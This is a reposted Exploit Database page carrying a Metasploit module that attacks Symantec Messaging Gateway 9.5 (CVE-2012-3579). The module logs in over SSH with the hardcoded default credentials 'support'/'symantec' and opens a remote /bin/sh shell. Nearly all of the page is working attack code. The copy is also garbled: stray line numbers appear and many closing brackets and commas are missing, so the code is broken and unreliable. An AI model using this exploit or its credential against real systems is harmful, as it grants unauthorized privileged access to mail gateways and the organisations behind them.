Symantec Messaging Gateway 9.5/9.5.1 – SSH Default Password Security Bypass (Metasploit)

Exploit Database
119 阅读

作者： Metasploit

日期： 2012-08-30
类别：
- remote
平台：
- linux
来源：https://www.exploit-db.com/exploits/21136/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/

require 'msf/core'

require 'net/ssh'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Auxiliary::CommandShell

def initialize(info={})

super(update_info(info,

'Name' => "Symantec Messaging Gateway 9.5 Default SSH Password Vulnerability",

'Description'=> %q{

This module exploits a default misconfiguration flaw on Symantec Messaging Gateway.

The 'support' user has a known default password, which can be used to login to the

SSH service, and gain privileged access from remote.

'License'=> MSF_LICENSE,

'Author' =>

[

'Stefan Viehbock',#Original discovery

'Ben Williams', #Reporting the vuln + coordinated release

'sinn3r'#Metasploit

'References' =>

[

['CVE', '2012-3579'],

['OSVDB', '85028'],

['BID', '55143'],

['URL', 'https://www.sec-consult.com/files/20120829-0_Symantec_Mail_Gateway_Support_Backdoor.txt'],

['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120827_00']

'DefaultOptions'=>

{

'ExitFunction' => "none"

'Payload'=>

{

'Compat' => {

'PayloadType'=> 'cmd_interact',

'ConnectionType' => 'find'

}

'Platform' => 'unix',

'Arch' => ARCH_CMD,

'Targets'=>

[

['Symantec Messaging Gateway 9.5', {}],

'Privileged' => true,

#Timestamp on Symantec advisory

#But was found on Jun 26, 2012

'DisclosureDate' => "Aug 27 2012",

'DefaultTarget'=> 0))

register_options(

[

Opt::RHOST(),

Opt::RPORT(22)

], self.class

)

register_advanced_options(

[

OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),

OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])

]

)

end

def rhost

datastore['RHOST']

end

def rport

datastore['RPORT']

end

def do_login(user, pass)

opts = {

:auth_methods => ['password', 'keyboard-interactive'],

:msframework=> framework,

:msfmodule=> self,

:port => rport,

:disable_agent => true,

:config => false,

:password => pass,

:record_auth_info => true,

:proxies => datastore['Proxies']

}

opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']

begin

ssh = nil

::Timeout.timeout(datastore['SSH_TIMEOUT']) do

ssh = Net::SSH.start(rhost, user, opts)

end

rescue Rex::ConnectionError, Rex::AddressInUse

return

rescue Net::SSH::Disconnect, ::EOFError

print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"

return

rescue ::Timeout::Error

print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"

return

rescue Net::SSH::AuthenticationFailed

print_error "#{rhost}:#{rport} SSH - Failed authentication"

rescue Net::SSH::Exception => e

print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"

return

end

if ssh

conn = Net::SSH::CommandStream.new(ssh, '/bin/sh', true)

ssh = nil

return conn

end

return nil

end

def exploit

user = 'support'

pass = 'symantec'

print_status("#{rhost}:#{rport} - Attempt to login...")

conn = do_login(user, pass)

if conn

print_good("#{rhost}:#{rport} - Login Successful with '#{user}:#{pass}'")

handler(conn.lsock)

end